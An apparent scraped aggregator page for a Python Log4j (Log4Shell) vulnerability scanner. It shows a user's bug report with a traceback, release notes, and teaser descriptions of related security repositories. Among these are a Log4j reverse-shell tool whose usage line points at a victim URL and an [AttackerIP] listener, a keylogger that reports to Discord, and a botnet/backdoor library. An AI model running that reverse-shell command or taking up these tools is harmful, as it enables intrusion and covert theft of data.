Scanning for CVE-2021-44228, CVE-2021-45046, CVE-2019-17571
Requires a minimum of Python 2.7. Can be executed as Custom Script Rule of an Audit or via a Server Script with Server Automation. Also executable standalone from the command line if an Agent is present.
Reference
log4j-nullroute Quick script to ingest IP feed from greynoise.io for log4j (CVE-2021-44228) and null route bad addresses. Works w/Cisco IOS-XE and Ari
Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from https://github.co
log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description This demo Tomcat 8 server has a vulnerable app deployed on it and is also vulne
log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script
log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk
log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be
Log4jTools Tools for investigating Log4j CVE-2021-44228 FetchPayload.py (Get java payload from ldap path provided in JNDI lookup). Example command: Re
Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At
We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them
Windows 11 python -m pip install pywin32 Python 3.10.1
Thanks, first, for offering this script.
Get the following error when running your script.
5 Sep 12, 2022
6 Dec 28, 2022
60 Dec 10, 2022
1 Dec 15, 2021
431 Dec 22, 2022
144 Nov 19, 2022
91 Dec 29, 2022
16 Mar 24, 2022
13 Jan 4, 2022
c:\dev\github\log4j_scanner>python scanner_win.py
Indicator for vulnerable component found in C:\$RECYCLE.BIN\S-1-5-21-67875770-1077041941-3688728843-1001\$RTYFQH1.jar: log4j 2.9.1-2.10.0
Unhandled exception processing C:\Program Files\Cryptomator\app\mods\javafx-graphics-17.0.1-win.jar
Traceback (most recent call last):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 88, in main
if handleJar(filename, filename):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 72, in handleJar
return handleJar(io.BytesIO(z.read(name)), filename.decode('utf-8')+":"+name)
AttributeError: 'str' object has no attribute 'decode'. Did you mean: 'encode'?
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 96, in <module>
sys.exit(main())
File "c:\dev\github\log4j_scanner\scanner_win.py", line 92, in main
traceback.print_exc()
NameError: name 'traceback' is not defined
Any idea why this is causing an issue.
bugAdded checksums for CVE-2021-44832
Source code(tar.gz)Python 3 compatible Use all but 2 CPUs for digest computations.
Source code(tar.gz)Some windows boxes throw an exception calling cpu_count()
Source code(tar.gz)Every project has to have an initial stable release
Source code(tar.gz)Hive Burp Suite Extension Description Hive extension for Burp Suite. This extension allows you to send data from Burp to Hive in one click. Create iss
massStringer MassStringer, CTF Flag Finder Usage: python3 massStringer.py Enter absolute path of the directory to scan for flags Edit "flag = re.searc
r2flutch Yet another tool to decrypt iOS apps using r2frida. Requirements It requires to install Frida on the Jailbroken iOS device: Jailbroken device
Hashpic Hashpic creates an image from the MD5 hash of your input. Since v0.2.0 i
About This is an IDA Pro (Interactive Disassembler) plugin allowing to automatically analyze and annotate Linux kernel alternatives (content of .altin
Subdomain-Scanner A simple subdomain scanner in python ✨ Features scans subdomains of a domain thats it! 💁♀️ How to use first download the scanner.p
⚜️ Berserker ⚜️ An unique Python3 obfuscator using Kyrie Eleison's encryption protocol, written in Python3. 📋 Examples 📋 Unobfuscated: input("Hello
infotr A traceroute tool that also displays IP information. This tool has only been tested on Linux. Quick Start First, install this tool from PyPI. p
log4shell-poc-py POC for detecting the Log4Shell (Log4J RCE) vulnerability. Run on a system with python3 python3 log4shell-poc.py pathToTargetFile
FUD Keylogger That Reports To Discord This python script will capture all of the keystrokes within a given time frame and report them to a Discord Ser
CamOver is a camera exploitation tool that allows to disclosure network camera admin password. Features Exploits vulnerabilities in most popul
dora Features Blazing fast as we are using ripgrep in backend Exploit/PoC steps for many of the API key, allowing to write a good report for bug bount
docker-from-omero-poc proof-of-concept running docker container from omero web How-to Edit test_script.py so that the BaseClient is created pointing t
This is a console-based version of a password generator written with Python. The program generates a password based on numbers of letters, numbers, and symbols specified by the user. This is a simple
pybotnet A Python Library for building botnet , trojan or backdoor for windows and linux with Telegram control panel Disclaimer: Please note that this
SpaceSiren SpaceSiren is a honey token manager and alert system for AWS. With this fully serverless application, you can create and manage honey token
🔗 Don't know what type of hash it is? Name That Hash will name that hash type! 🤖 Identify MD5, SHA256 and 3000+ other hashes ☄ Comes with a neat web app 🔥
labsecurity labsecurity is a tool that brings together python scripts made for ethical hacking, in a single tool, through a console interface. Warning
Parler's unofficial API with all endpoints present in their iOS app as of 08/12/2020. For the most part undocumented, but the error responses are alre
NEW FACEBOOK CLONER WITH NEW PASSWORD, TERMUX FB CLONE, FB CLONING COMMAND. M
7 Dec 07, 2022
4 Sep 06, 2022
146 Jan 03, 2023
15 Nov 23, 2022
16 Oct 12, 2022
2 Jan 07, 2022
81 Dec 07, 2022
10 Oct 29, 2022
2 Dec 22, 2021
36 Dec 20, 2022
247 Jan 02, 2023
243 Dec 27, 2022
2 Jan 22, 2022
1 Jan 24, 2022
181 Jan 02, 2023
287 Nov 09, 2022
1.2k Dec 28, 2022
16 Dec 08, 2022
393 Nov 26, 2022
81 Jan 08, 2023